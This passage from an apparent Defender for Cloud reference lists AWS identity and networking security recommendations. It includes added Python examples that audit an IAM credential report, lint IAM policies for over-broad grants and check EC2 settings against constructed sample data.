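Three of the IAM rows in this section (access keys rotated every 90 days or less, credentials unused for 90 days or greater disabled, and MFA for every IAM user with a console password) can all be answered from one IAM credential report. The block below is an added example, not Microsoft's or AWS's code: the CSV header follows the credential report's column layout, while the user rows, account ID and evaluation date are constructed. A real report comes from `aws iam generate-credential-report` followed by `aws iam get-credential-report`, whose Content field is base64-encoded CSV.

```python
"""Added example, not Microsoft's or AWS's code: three of this table's IAM checks run over
an IAM credential report. The header is the report's layout; the rows are constructed."""
import csv
import io
from datetime import datetime, timezone

AS_OF = datetime(2023, 7, 24, tzinfo=timezone.utc)          # constructed evaluation time
PLACEHOLDERS = {"N/A", "no_information", "not_supported", ""}  # the report's non-date values

SAMPLE_CREDENTIAL_REPORT = """\
user,arn,user_creation_time,password_enabled,password_last_used,password_last_changed,password_next_rotation,mfa_active,access_key_1_active,access_key_1_last_rotated,access_key_1_last_used_date,access_key_1_last_used_region,access_key_1_last_used_service,access_key_2_active,access_key_2_last_rotated,access_key_2_last_used_date,access_key_2_last_used_region,access_key_2_last_used_service,cert_1_active,cert_1_last_rotated,cert_2_active,cert_2_last_rotated
<root_account>,arn:aws:iam::111111111111:root,2021-01-05T00:00:00+00:00,not_supported,2023-07-20T00:00:00+00:00,not_supported,not_supported,true,false,N/A,N/A,N/A,N/A,false,N/A,N/A,N/A,N/A,false,N/A,false,N/A
alice,arn:aws:iam::111111111111:user/alice,2022-03-01T00:00:00+00:00,true,2023-07-23T00:00:00+00:00,2023-05-01T00:00:00+00:00,2023-07-30T00:00:00+00:00,true,true,2023-06-30T00:00:00+00:00,2023-07-23T00:00:00+00:00,us-east-1,s3,false,N/A,N/A,N/A,N/A,false,N/A,false,N/A
bob,arn:aws:iam::111111111111:user/bob,2022-03-01T00:00:00+00:00,true,2023-02-01T00:00:00+00:00,2022-11-01T00:00:00+00:00,2023-01-30T00:00:00+00:00,false,true,2023-01-10T00:00:00+00:00,2023-01-20T00:00:00+00:00,eu-west-1,ec2,false,N/A,N/A,N/A,N/A,false,N/A,false,N/A
svc-deploy,arn:aws:iam::111111111111:user/svc-deploy,2022-06-15T00:00:00+00:00,false,N/A,N/A,N/A,false,true,2023-07-01T00:00:00+00:00,2023-07-23T00:00:00+00:00,us-east-1,sts,true,2022-12-01T00:00:00+00:00,no_information,N/A,N/A,false,N/A,false,N/A
"""


def parse_credential_report(text):
    """One dict per user, keyed by the report's column names."""
    return list(csv.DictReader(io.StringIO(text)))


def _parse_time(value):
    """ISO-8601 timestamp, or None for the report's placeholder values."""
    return None if value in PLACEHOLDERS else datetime.fromisoformat(value)


def _age_days(as_of, when):
    return (as_of - when).days


def stale_access_keys(rows, as_of, max_age_days=90):
    """(user, key slot, age in days) for every active key rotated more than max_age_days ago."""
    findings = []
    for row in rows:
        for slot in (1, 2):
            if row[f"access_key_{slot}_active"] != "true":
                continue
            rotated = _parse_time(row[f"access_key_{slot}_last_rotated"])
            if rotated is not None and _age_days(as_of, rotated) > max_age_days:
                findings.append((row["user"], slot, _age_days(as_of, rotated)))
    return findings


def unused_credentials(rows, as_of, days=90):
    """(user, credential, idle days) for enabled passwords and active keys unused for `days`
    or more. With no last-used record, the last change/rotation time (then user creation) is
    used as the age reference, so a never-used credential still ages (assumption)."""
    findings = []
    for row in rows:
        if row["password_enabled"] == "true":
            last = (_parse_time(row["password_last_used"])
                    or _parse_time(row["password_last_changed"])
                    or _parse_time(row["user_creation_time"]))
            if last is not None and _age_days(as_of, last) >= days:
                findings.append((row["user"], "password", _age_days(as_of, last)))
        for slot in (1, 2):
            if row[f"access_key_{slot}_active"] != "true":
                continue
            last = (_parse_time(row[f"access_key_{slot}_last_used_date"])
                    or _parse_time(row[f"access_key_{slot}_last_rotated"]))
            if last is not None and _age_days(as_of, last) >= days:
                findings.append((row["user"], f"access_key_{slot}", _age_days(as_of, last)))
    return findings


def console_users_without_mfa(rows):
    """IAM users with a console password and no MFA device; the root row is handled by the
    separate root-MFA recommendations, so it is excluded here."""
    return [row["user"] for row in rows
            if row["user"] != "<root_account>"
            and row["password_enabled"] == "true"
            and row["mfa_active"] != "true"]


if __name__ == "__main__":
    rows = parse_credential_report(SAMPLE_CREDENTIAL_REPORT)
    print("stale keys:", stale_access_keys(rows, AS_OF))
    print("unused credentials:", unused_credentials(rows, AS_OF))
    print("console users without MFA:", console_users_without_mfa(rows))
```

The svc-deploy row shows why the fallback in unused_credentials matters: its second key reports no_information for last use, and without ageing it from the rotation date a key that has sat unused since 2022 would never surface.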


Recommendation: Hardware MFA should be enabled for the "root" account (Severity: Low)

The root account is the most privileged user in an account. MFA adds an extra layer of protection on top of a user name and password. With MFA enabled, when a user signs in to an AWS website, they're prompted for their user name and password and for an authentication code from their AWS MFA device.

For Level 2, it is recommended that you protect the root account with a hardware MFA. A hardware MFA has a smaller attack surface than a virtual MFA. For example, a hardware MFA doesn't suffer the attack surface introduced by the mobile smartphone that a virtual MFA resides on.

Using hardware MFA for many accounts might create a logistical device management issue. If this occurs, consider implementing this Level 2 recommendation selectively to the highest security accounts. You can then apply the Level 1 recommendation to the remaining accounts.

Recommendation: IAM authentication should be configured for RDS clusters (Severity: Medium)

This control checks whether an RDS DB cluster has IAM database authentication enabled.

IAM database authentication allows for password-free authentication to database instances. The authentication uses an authentication token. Network traffic to and from the database is encrypted using SSL. For more information, see IAM database authentication in the Amazon Aurora User Guide.

Recommendation: IAM authentication should be configured for RDS instances (Severity: Medium)

This control checks whether an RDS DB instance has IAM database authentication enabled.

IAM database authentication allows authentication to database instances with an authentication token instead of a password. Network traffic to and from the database is encrypted using SSL. For more information, see IAM database authentication in the Amazon Aurora User Guide.


Recommendation: IAM customer managed policies should not allow decryption actions on all KMS keys
Severity: Medium
Description: Checks whether the default version of IAM customer managed policies allows principals to use the AWS KMS decryption actions on all resources. This control uses Zelkova, an automated reasoning engine, to validate and warn you about policies that may grant broad access to your secrets across AWS accounts. This control fails if the "kms:Decrypt" or "kms:ReEncryptFrom" actions are allowed on all KMS keys. The control evaluates both attached and unattached customer managed policies. It does not check inline policies or AWS managed policies.

With AWS KMS, you control who can use your KMS keys and gain access to your encrypted data. IAM policies define which actions an identity (user, group, or role) can perform on which resources. Following security best practices, AWS recommends that you allow least privilege. In other words, you should grant to identities only the "kms:Decrypt" or "kms:ReEncryptFrom" permissions and only for the keys that are required to perform a task. Otherwise, the user might use keys that are not appropriate for your data.

Instead of granting permissions for all keys, determine the minimum set of keys that users need to access encrypted data. Then design policies that allow users to use only those keys. For example, do not allow "kms:Decrypt" permission on all KMS keys. Instead, allow "kms:Decrypt" only on keys in a particular Region for your account. By adopting the principle of least privilege, you can reduce the risk of unintended disclosure of your data.


Recommendation: IAM customer managed policies that you create should not allow wildcard actions for services
Severity: Low
Description: This control checks whether the IAM identity-based policies that you create have Allow statements that use the * wildcard to grant permissions for all actions on any service. The control fails if any policy statement includes 'Effect': 'Allow' with 'Action': 'Service:*'. For example, the following statement in a policy results in a failed finding.

    "Statement": [
        {
            "Sid": "EC2-Wildcard",
            "Effect": "Allow",
            "Action": "ec2:*",
            "Resource": "*"
        }
    ]

The control also fails if you use 'Effect': 'Allow' with 'NotAction': 'service:*'. In that case, the NotAction element provides access to all of the actions in an AWS service, except for the actions specified in NotAction.

This control only applies to customer managed IAM policies. It does not apply to IAM policies that are managed by AWS.

When you assign permissions to AWS services, it is important to scope the allowed IAM actions in your IAM policies. You should restrict IAM actions to only those actions that are needed. This helps you to provision least privilege permissions. Overly permissive policies might lead to privilege escalation if the policies are attached to an IAM principal that might not require the permission.

In some cases, you might want to allow IAM actions that have a similar prefix, such as DescribeFlowLogs and DescribeAvailabilityZones. In these authorized cases, you can add a suffixed wildcard to the common prefix. For example, ec2:Describe*.

This control passes if you use a prefixed IAM action with a suffixed wildcard. For example, the following statement in a policy results in a passed finding.

    "Statement": [
        {
            "Sid": "EC2-Wildcard",
            "Effect": "Allow",
            "Action": "ec2:Describe*",
            "Resource": "*"
        }
    ]

When you group related IAM actions in this way, you can also avoid exceeding the IAM policy size limits.


Recommendation: IAM policies should be attached only to groups or roles
Severity: Low
Description: By default, IAM users, groups, and roles have no access to AWS resources. IAM policies are the means by which privileges are granted to users, groups, or roles.

It is recommended that IAM policies be applied directly to groups and roles but not users.

Assigning privileges at the group or role level reduces the complexity of access management as the number of users grows. Reducing access management complexity may in turn reduce the opportunity for a principal to inadvertently receive or retain excessive privileges.

Recommendation: IAM policies that allow full "*:*" administrative privileges should not be created
Severity: High
Description: IAM policies are the means by which privileges are granted to users, groups, or roles.

It is recommended and considered standard security advice to grant least privilege, that is, to grant only the permissions required to perform a task.

Determine what users need to do and then craft policies for them that let the users perform only those tasks, instead of allowing full administrative privileges.

It's more secure to start with a minimum set of permissions and grant additional permissions as necessary, rather than starting with permissions that are too lenient and then trying to tighten them later.

Providing full administrative privileges instead of restricting to the minimum set of permissions that the user requires exposes the resources to potentially unwanted actions.

IAM policies that have a statement with "Effect": "Allow" with "Action": "*" over "Resource": "*" should be removed.


Recommendation: IAM principals should not have IAM inline policies that allow decryption actions on all KMS keys
Severity: Medium
Description: Checks whether the inline policies that are embedded in your IAM identities (role, user, or group) allow the AWS KMS decryption actions on all KMS keys. This control uses Zelkova, an automated reasoning engine, to validate and warn you about policies that may grant broad access to your secrets across AWS accounts.

This control fails if "kms:Decrypt" or "kms:ReEncryptFrom" actions are allowed on all KMS keys in an inline policy.

With AWS KMS, you control who can use your KMS keys and gain access to your encrypted data. IAM policies define which actions an identity (user, group, or role) can perform on which resources. Following security best practices, AWS recommends that you allow least privilege. In other words, you should grant to identities only the permissions they need and only for keys that are required to perform a task. Otherwise, the user might use keys that are not appropriate for your data.

Instead of granting permission for all keys, determine the minimum set of keys that users need to access encrypted data. Then design policies that allow the users to use only those keys. For example, do not allow "kms:Decrypt" permission on all KMS keys. Instead, allow them only on keys in a particular Region for your account. By adopting the principle of least privilege, you can reduce the risk of unintended disclosure of your data.

Recommendation: Lambda functions should restrict public access
Severity: High
Description: Lambda function resource-based policies should restrict public access. This recommendation does not check access by internal principals.

Ensure access to the function is restricted to authorized principals only by using least privilege resource-based policies.

Recommendation: MFA should be enabled for all IAM users
Severity: Medium
Description: All IAM users should have multi-factor authentication (MFA) enabled.

Recommendation: MFA should be enabled for the "root" account
Severity: Low
Description: The root account is the most privileged user in an account. MFA adds an extra layer of protection on top of a user name and password. With MFA enabled, when a user signs in to an AWS website, they're prompted for their user name and password and for an authentication code from their AWS MFA device.

When you use virtual MFA for root accounts, it is recommended that the device used is not a personal device. Instead, use a dedicated mobile device (tablet or phone) that you manage to keep charged and secured independent of any individual personal devices.

This lessens the risk of losing access to the MFA due to device loss, device trade-in, or if the individual owning the device is no longer employed at the company.
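The four IAM policy controls above (full "*:*" administrative privileges, "service:*" wildcard actions, and the two KMS decryption-on-all-keys checks for customer managed and inline policies) can be pre-checked locally before a policy is ever attached. The following is an added example written for this page; it is not Defender for Cloud's or Zelkova's evaluation logic, only plain string matching over the policy JSON. Treating "kms:*" and "*" as also granting the two decryption actions is an assumption that goes beyond the page text, and the sample policies and the 111122223333 account number are constructed placeholders.

```python
import json
import re
from typing import Iterable, List

# Actions that the two KMS decryption controls on this page look for.
KMS_DECRYPT_ACTIONS = {"kms:decrypt", "kms:reencryptfrom"}
# The "service:*" form the wildcard-actions control fails on; "ec2:Describe*" does not match it.
SERVICE_WILDCARD = re.compile(r"^[a-z0-9-]+:\*$", re.IGNORECASE)


def _as_list(value) -> list:
    """IAM accepts a single string or a list for Statement, Action, NotAction and Resource."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def _allow_statements(policy: dict) -> Iterable[dict]:
    for stmt in _as_list(policy.get("Statement")):
        if stmt.get("Effect") == "Allow":
            yield stmt


def has_full_admin(policy: dict) -> bool:
    """"Effect": "Allow" with "Action": "*" over "Resource": "*" (the *:* control)."""
    return any(
        "*" in _as_list(s.get("Action")) and "*" in _as_list(s.get("Resource"))
        for s in _allow_statements(policy)
    )


def has_service_wildcard(policy: dict) -> bool:
    """Allow statement whose Action or NotAction uses the "service:*" form."""
    for stmt in _allow_statements(policy):
        actions = _as_list(stmt.get("Action")) + _as_list(stmt.get("NotAction"))
        if any(SERVICE_WILDCARD.match(a) for a in actions):
            return True
    return False


def allows_decrypt_on_all_keys(policy: dict) -> bool:
    """kms:Decrypt or kms:ReEncryptFrom allowed with Resource "*".
    Assumption beyond the page: "kms:*" and "*" also grant those actions, so they are flagged too."""
    for stmt in _allow_statements(policy):
        actions = {a.lower() for a in _as_list(stmt.get("Action"))}
        grants_decrypt = bool(actions & KMS_DECRYPT_ACTIONS) or bool(actions & {"kms:*", "*"})
        if grants_decrypt and "*" in _as_list(stmt.get("Resource")):
            return True
    return False


def lint_policy(policy_json: str) -> List[str]:
    """Names of the controls above that the given policy document would fail."""
    policy = json.loads(policy_json)
    findings = []
    if has_full_admin(policy):
        findings.append("full-admin-privileges")
    if has_service_wildcard(policy):
        findings.append("service-wildcard-action")
    if allows_decrypt_on_all_keys(policy):
        findings.append("kms-decrypt-all-keys")
    return findings


# Constructed sample policies (not taken from any real account).
FAILING_WILDCARD = json.dumps({"Version": "2012-10-17", "Statement": [
    {"Sid": "EC2-Wildcard", "Effect": "Allow", "Action": "ec2:*", "Resource": "*"}]})
PASSING_PREFIXED = json.dumps({"Version": "2012-10-17", "Statement": [
    {"Sid": "EC2-Wildcard", "Effect": "Allow", "Action": "ec2:Describe*", "Resource": "*"}]})
FAILING_NOTACTION = json.dumps({"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "NotAction": "iam:*", "Resource": "*"}]})
FULL_ADMIN = json.dumps({"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Action": "*", "Resource": "*"}]})
KMS_ALL_KEYS = json.dumps({"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Action": ["kms:Decrypt", "kms:ReEncryptFrom"], "Resource": "*"}]})
# Scoped to one Region of one (placeholder) account, as the KMS controls recommend.
KMS_SCOPED = json.dumps({"Version": "2012-10-17", "Statement": [
    {"Effect": "Allow", "Action": "kms:Decrypt",
     "Resource": "arn:aws:kms:us-east-1:111122223333:key/*"}]})

if __name__ == "__main__":
    for name, doc in [("wildcard", FAILING_WILDCARD), ("prefixed", PASSING_PREFIXED),
                      ("full-admin", FULL_ADMIN), ("kms-scoped", KMS_SCOPED)]:
        print(name, lint_policy(doc))
```

A policy that allows "*" on "*" is reported by both the full-admin and the KMS check, which matches how the two controls would both fail on such a statement.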


Recommendation: Password policies for IAM users should have strong configurations
Severity: Medium
Description: Checks whether the account password policy for IAM users uses the following minimum configurations.

* RequireUppercaseCharacters: Require at least one uppercase character in the password. (Default = true)

* RequireLowercaseCharacters: Require at least one lowercase character in the password. (Default = true)

* RequireNumbers: Require at least one number in the password. (Default = true)

* MinimumPasswordLength: Password minimum length. (Default = 7 or longer)

* PasswordReusePrevention: Number of passwords before allowing reuse. (Default = 4)

* MaxPasswordAge: Number of days before password expiration. (Default = 90)

Recommendation: Root account access key shouldn't exist
Severity: High
Description: The root account is the most privileged user in an AWS account. AWS Access Keys provide programmatic access to a given AWS account.

It is recommended that all access keys associated with the root account be removed.

Removing access keys associated with the root account limits the vectors by which the account can be compromised.

Additionally, removing the root access keys encourages the creation and use of role-based accounts that are least privileged.

Recommendation: S3 Block Public Access setting should be enabled
Severity: Medium
Description: Enabling the Block Public Access setting for your S3 bucket can help prevent sensitive data leaks and protect your bucket from malicious actions.

Recommendation: S3 Block Public Access setting should be enabled at the bucket level
Severity: High
Description: This control checks whether S3 buckets have bucket-level public access blocks applied. This control fails if any of the following settings are set to false:

* ignorePublicAcls

* blockPublicPolicy

* blockPublicAcls

* restrictPublicBuckets

Block Public Access at the S3 bucket level provides controls to ensure that objects never have public access. Public access is granted to buckets and objects through access control lists (ACLs), bucket policies, or both.

Unless you intend to have your S3 buckets publicly accessible, you should configure the bucket level Amazon S3 Block Public Access feature.


Recommendation: S3 buckets public read access should be removed
Severity: High
Description: Removing public read access to your S3 bucket can help protect your data and prevent a data breach.

Recommendation: S3 buckets public write access should be removed
Severity: High
Description: Allowing public write access to your S3 bucket can leave you vulnerable to malicious actions such as storing data at your expense, encrypting your files for ransom, or using your bucket to operate malware.

Recommendation: Secrets Manager secrets should have automatic rotation enabled
Severity: Medium
Description: This control checks whether a secret stored in AWS Secrets Manager is configured with automatic rotation.

Secrets Manager helps you improve the security posture of your organization. Secrets include database credentials, passwords, and third-party API keys. You can use Secrets Manager to store secrets centrally, encrypt secrets automatically, control access to secrets, and rotate secrets safely and automatically.

Secrets Manager can rotate secrets. You can use rotation to replace long-term secrets with short-term ones. Rotating your secrets limits how long an unauthorized user can use a compromised secret. For this reason, you should rotate your secrets frequently. To learn more about rotation, see Rotating your AWS Secrets Manager secrets in the AWS Secrets Manager User Guide.

Recommendation: Stopped EC2 instances should be removed after a specified time period
Severity: Medium
Description: This control checks whether any EC2 instances have been stopped for more than the allowed number of days. An EC2 instance fails this check if it is stopped for longer than the maximum allowed time period, which by default is 30 days.

A failed finding indicates that an EC2 instance has not run for a significant period of time. This creates a security risk because the EC2 instance is not being actively maintained (analyzed, patched, updated). If it is later launched, the lack of proper maintenance could result in unexpected issues in your AWS environment. To safely maintain an EC2 instance over time in a nonrunning state, start it periodically for maintenance and then stop it after maintenance. Ideally this is an automated process.


AWS Networking recommendations


There are 36 AWS recommendations in this category.


Recommendation: Amazon EC2 should be configured to use VPC endpoints
Severity: Medium
Description: This control checks whether a service endpoint for Amazon EC2 is created for each VPC. The control fails if a VPC does not have a VPC endpoint created for the Amazon EC2 service.

To improve the security posture of your VPC, you can configure Amazon EC2 to use an interface VPC endpoint. Interface endpoints are powered by AWS PrivateLink, a technology that enables you to access Amazon EC2 API operations privately. It restricts all network traffic between your VPC and Amazon EC2 to the Amazon network. Because endpoints are supported within the same Region only, you cannot create an endpoint between a VPC and a service in a different Region. This prevents unintended Amazon EC2 API calls to other Regions.

To learn more about creating VPC endpoints for Amazon EC2, see Amazon EC2 and interface VPC endpoints in the Amazon EC2 User Guide for Linux Instances.

Recommendation: Amazon ECS services should not have public IP addresses assigned to them automatically
Severity: High
Description: A public IP address is an IP address that is reachable from the internet.

If you launch your Amazon ECS instances with a public IP address, then your Amazon ECS instances are reachable from the internet.

Amazon ECS services should not be publicly accessible, as this may allow unintended access to your container application servers.

Recommendation: Amazon EMR cluster master nodes should not have public IP addresses
Severity: High
Description: This control checks whether master nodes on Amazon EMR clusters have public IP addresses.

The control fails if the master node has public IP addresses that are associated with any of its instances. Public IP addresses are designated in the PublicIp field of the NetworkInterfaces configuration for the instance.

This control only checks Amazon EMR clusters that are in a RUNNING or WAITING state.

Recommendation: Amazon Redshift clusters should use enhanced VPC routing
Severity: High
Description: This control checks whether an Amazon Redshift cluster has EnhancedVpcRouting enabled.

Enhanced VPC routing forces all COPY and UNLOAD traffic between the cluster and data repositories to go through your VPC. You can then use VPC features such as security groups and network access control lists to secure network traffic. You can also use VPC Flow Logs to monitor network traffic.

Recommendation: Application Load Balancer should be configured to redirect all HTTP requests to HTTPS
Severity: Medium
Description: To enforce encryption in transit, you should use redirect actions with Application Load Balancers to redirect client HTTP requests to an HTTPS request on port 443.


Recommendation: Application load balancers should be configured to drop HTTP headers
Severity: Medium
Description: This control evaluates AWS Application Load Balancers (ALB) to ensure they are configured to drop invalid HTTP headers. The control fails if the value of routing.http.drop_invalid_header_fields.enabled is set to false.

By default, ALBs are not configured to drop invalid HTTP header values. Removing these header values prevents HTTP desync attacks.

Recommendation: Configure Lambda functions to a VPC
Severity: Low
Description: This control checks whether a Lambda function is in a VPC. It does not evaluate the VPC subnet routing configuration to determine public reachability.

Note that if Lambda@Edge is found in the account, then this control generates failed findings. To prevent these findings, you can disable this control.

Recommendation: EC2 instances should not have a public IP address
Severity: High
Description: This control checks whether EC2 instances have a public IP address. The control fails if the "publicIp" field is present in the EC2 instance configuration item. This control applies to IPv4 addresses only.

A public IPv4 address is an IP address that is reachable from the internet. If you launch your instance with a public IP address, then your EC2 instance is reachable from the internet. A private IPv4 address is an IP address that is not reachable from the internet. You can use private IPv4 addresses for communication between EC2 instances in the same VPC or in your connected private network.

IPv6 addresses are globally unique, and therefore are reachable from the internet. However, by default all subnets have the IPv6 addressing attribute set to false. For more information about IPv6, see IP addressing in your VPC in the Amazon VPC User Guide.

If you have a legitimate use case to maintain EC2 instances with public IP addresses, then you can suppress the findings from this control. For more information about front-end architecture options, see the AWS Architecture Blog or the This Is My Architecture series.

Recommendation: EC2 instances should not use multiple ENIs
Severity: Low
Description: This control checks whether an EC2 instance uses multiple Elastic Network Interfaces (ENIs) or Elastic Fabric Adapters (EFAs). This control passes if a single network adapter is used. The control includes an optional parameter list to identify the allowed ENIs.

Multiple ENIs can cause dual-homed instances, meaning instances that have multiple subnets. This can add network security complexity and introduce unintended network paths and access.


Recommendation: EC2 instances should use IMDSv2
Severity: High
Description: This control checks whether your EC2 instance metadata version is configured with Instance Metadata Service Version 2 (IMDSv2). The control passes if "HttpTokens" is set to "required" for IMDSv2. The control fails if "HttpTokens" is set to "optional".

You use instance metadata to configure or manage the running instance. The IMDS provides access to temporary, frequently rotated credentials. These credentials remove the need to hard code or distribute sensitive credentials to instances manually or programmatically. The IMDS is attached locally to every EC2 instance. It runs on a special 'link local' IP address of 169.254.169.254. This IP address is only accessible by software that runs on the instance.

Version 2 of the IMDS adds new protections for the following types of vulnerabilities. These vulnerabilities could be used to try to access the IMDS.

* Open website application firewalls

* Open reverse proxies

* Server-side request forgery (SSRF) vulnerabilities

* Open Layer 3 firewalls and network address translation (NAT)

Security Hub recommends that you configure your EC2 instances with IMDSv2.

Recommendation: EC2 subnets should not automatically assign public IP addresses
Severity: Medium
Description: This control checks whether the assignment of public IPs in Amazon Virtual Private Cloud (Amazon VPC) subnets has "MapPublicIpOnLaunch" set to "FALSE". The control passes if the flag is set to "FALSE".

All subnets have an attribute that determines whether a network interface created in the subnet automatically receives a public IPv4 address. Instances that are launched into subnets that have this attribute enabled have a public IP address assigned to their primary network interface.

Recommendation: Ensure a log metric filter and alarm exist for AWS Config configuration changes
Severity: Low
Description: Real-time monitoring of API calls can be achieved by directing CloudTrail Logs to CloudWatch Logs and establishing corresponding metric filters and alarms.

It is recommended that a metric filter and alarm be established for detecting changes to CloudTrail's configurations.

Monitoring changes to AWS Config configuration will help ensure sustained visibility of configuration items within the AWS account.
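The EC2 instance and subnet controls above (IMDSv2 "HttpTokens", public IPv4 address, multiple ENIs with an allow list, "MapPublicIpOnLaunch", and the stopped-for-more-than-30-days check from the identity table earlier) all reduce to a handful of field tests on the records that describe-instances and describe-subnets return. The following is an added example, not Defender for Cloud's own evaluation code; it uses the EC2 API field names (MetadataOptions.HttpTokens, PublicIpAddress, NetworkInterfaces, StateTransitionReason, MapPublicIpOnLaunch) rather than the AWS Config "publicIp" name quoted on the page, and the instance records, ENI ids and 203.0.113.10 address are constructed samples.

```python
import re
from datetime import datetime, timedelta, timezone
from typing import Dict, List, Sequence

MAX_STOPPED_DAYS = 30  # default period of the stopped-instances control
# EC2 reports the stop time inside StateTransitionReason, e.g. "User initiated (2023-05-01 09:00:00 GMT)"
_STOP_TIME = re.compile(r"\((\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) GMT\)")


def check_instance(instance: dict, now: datetime, allowed_enis: Sequence[str] = ()) -> List[str]:
    """Return the names of the controls that one describe-instances record fails."""
    findings = []
    # IMDSv2: only HttpTokens == "required" passes; "optional" (the default) fails.
    if instance.get("MetadataOptions", {}).get("HttpTokens", "optional") != "required":
        findings.append("imdsv2-not-required")
    # A public IPv4 address on the instance fails the public-IP control (IPv4 only, as on the page).
    if instance.get("PublicIpAddress"):
        findings.append("public-ip-address")
    # More than one ENI that is not on the allow list fails the multiple-ENI control.
    enis = [n["NetworkInterfaceId"] for n in instance.get("NetworkInterfaces", [])]
    if len([e for e in enis if e not in allowed_enis]) > 1:
        findings.append("multiple-enis")
    # Stopped for longer than the allowed period.
    if instance.get("State", {}).get("Name") == "stopped":
        match = _STOP_TIME.search(instance.get("StateTransitionReason", ""))
        if match:
            stopped_at = datetime.strptime(match.group(1), "%Y-%m-%d %H:%M:%S").replace(tzinfo=timezone.utc)
            if now - stopped_at > timedelta(days=MAX_STOPPED_DAYS):
                findings.append("stopped-over-30-days")
    return findings


def check_subnet(subnet: dict) -> List[str]:
    """The subnet control passes only when MapPublicIpOnLaunch is false."""
    return [] if subnet.get("MapPublicIpOnLaunch") is False else ["auto-assign-public-ip"]


def scan(instances: List[dict], now: datetime, allowed_enis: Sequence[str] = ()) -> Dict[str, List[str]]:
    return {i["InstanceId"]: check_instance(i, now, allowed_enis) for i in instances}


# Constructed sample records in describe-instances / describe-subnets shape.
NOW = datetime(2023, 8, 1, tzinfo=timezone.utc)
INSTANCES = [
    {"InstanceId": "i-0aaa", "State": {"Name": "running"},
     "MetadataOptions": {"HttpTokens": "required"},
     "NetworkInterfaces": [{"NetworkInterfaceId": "eni-1"}]},
    {"InstanceId": "i-0bbb", "State": {"Name": "running"}, "PublicIpAddress": "203.0.113.10",
     "MetadataOptions": {"HttpTokens": "optional"},
     "NetworkInterfaces": [{"NetworkInterfaceId": "eni-2"}, {"NetworkInterfaceId": "eni-3"}]},
    {"InstanceId": "i-0ccc", "State": {"Name": "stopped"},
     "StateTransitionReason": "User initiated (2023-05-01 09:00:00 GMT)",
     "MetadataOptions": {"HttpTokens": "required"},
     "NetworkInterfaces": [{"NetworkInterfaceId": "eni-4"}]},
]
SUBNETS = [{"SubnetId": "subnet-1", "MapPublicIpOnLaunch": True},
           {"SubnetId": "subnet-2", "MapPublicIpOnLaunch": False}]

if __name__ == "__main__":
    print(scan(INSTANCES, NOW))
    print({s["SubnetId"]: check_subnet(s) for s in SUBNETS})
```

Passing "eni-3" in allowed_enis mirrors the control's optional allowed-ENI parameter: the second adapter is then tolerated and i-0bbb no longer fails the multiple-ENI check.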


Recommendation: Ensure a log metric filter and alarm exist for AWS Management Console authentication failures
Severity: Low
Description: Real-time monitoring of API calls can be achieved by directing CloudTrail Logs to CloudWatch Logs and establishing corresponding metric filters and alarms.

It is recommended that a metric filter and alarm be established for failed console authentication attempts.

Monitoring failed console logins may decrease the lead time to detect an attempt to brute force a credential, which may provide an indicator, such as source IP, that can be used in other event correlation.

Recommendation: Ensure a log metric filter and alarm exist for changes to Network Access Control Lists (NACL)
Severity: Low
Description: Real-time monitoring of API calls can be achieved by directing CloudTrail Logs to CloudWatch Logs and establishing corresponding metric filters and alarms. NACLs are used as a stateless packet filter to control ingress and egress traffic for subnets within a VPC.

It is recommended that a metric filter and alarm be established for changes made to NACLs.

Monitoring changes to NACLs will help ensure that AWS resources and services are not unintentionally exposed.

Recommendation: Ensure a log metric filter and alarm exist for changes to network gateways
Severity: Low
Description: Real-time monitoring of API calls can be achieved by directing CloudTrail Logs to CloudWatch Logs and establishing corresponding metric filters and alarms. Network gateways are required to send/receive traffic to a destination outside of a VPC.

It is recommended that a metric filter and alarm be established for changes to network gateways.

Monitoring changes to network gateways will help ensure that all ingress/egress traffic traverses the VPC border via a controlled path.

Recommendation: Ensure a log metric filter and alarm exist for CloudTrail configuration changes
Severity: Low
Description: Real-time monitoring of API calls can be achieved by directing CloudTrail Logs to CloudWatch Logs and establishing corresponding metric filters and alarms.

It is recommended that a metric filter and alarm be established for detecting changes to CloudTrail's configurations.

Monitoring changes to CloudTrail's configuration will help ensure sustained visibility into activities performed in the AWS account.

Recommendation: Ensure a log metric filter and alarm exist for disabling or scheduled deletion of customer created CMKs
Severity: Low
Description: Real-time monitoring of API calls can be achieved by directing CloudTrail Logs to CloudWatch Logs and establishing corresponding metric filters and alarms.

It is recommended that a metric filter and alarm be established for customer created CMKs which have changed state to disabled or scheduled deletion.

Data encrypted with disabled or deleted keys will no longer be accessible.


Recommendation: Ensure a log metric filter and alarm exist for IAM policy changes
Severity: Low
Description: Real-time monitoring of API calls can be achieved by directing CloudTrail Logs to CloudWatch Logs and establishing corresponding metric filters and alarms.

It is recommended that a metric filter and alarm be established for changes made to Identity and Access Management (IAM) policies.

Monitoring changes to IAM policies will help ensure authentication and authorization controls remain intact.

Recommendation: Ensure a log metric filter and alarm exist for Management Console sign-in without MFA
Severity: Low
Description: Real-time monitoring of API calls can be achieved by directing CloudTrail Logs to CloudWatch Logs and establishing corresponding metric filters and alarms.

It is recommended that a metric filter and alarm be established for console logins that are not protected by multi-factor authentication (MFA).

Monitoring for single-factor console logins will increase visibility into accounts that are not protected by MFA.

Recommendation: Ensure a log metric filter and alarm exist for route table changes
Severity: Low
Description: Real-time monitoring of API calls can be achieved by directing CloudTrail Logs to CloudWatch Logs and establishing corresponding metric filters and alarms. Routing tables are used to route network traffic between subnets and to network gateways.

It is recommended that a metric filter and alarm be established for changes to route tables.

Monitoring changes to route tables will help ensure that all VPC traffic flows through an expected path.

Recommendation: Ensure a log metric filter and alarm exist for S3 bucket policy changes
Severity: Low
Description: Real-time monitoring of API calls can be achieved by directing CloudTrail Logs to CloudWatch Logs and establishing corresponding metric filters and alarms.

It is recommended that a metric filter and alarm be established for changes to S3 bucket policies.

Monitoring changes to S3 bucket policies may reduce the time to detect and correct permissive policies on sensitive S3 buckets.

Recommendation: Ensure a log metric filter and alarm exist for security group changes
Severity: Low
Description: Real-time monitoring of API calls can be achieved by directing CloudTrail Logs to CloudWatch Logs and establishing corresponding metric filters and alarms. Security Groups are a stateful packet filter that controls ingress and egress traffic within a VPC.

It is recommended that a metric filter and alarm be established for changes to Security Groups.

Monitoring changes to security groups will help ensure that resources and services are not unintentionally exposed.


Recommendation: Ensure a log metric filter and alarm exist for unauthorized API calls
Severity: Low
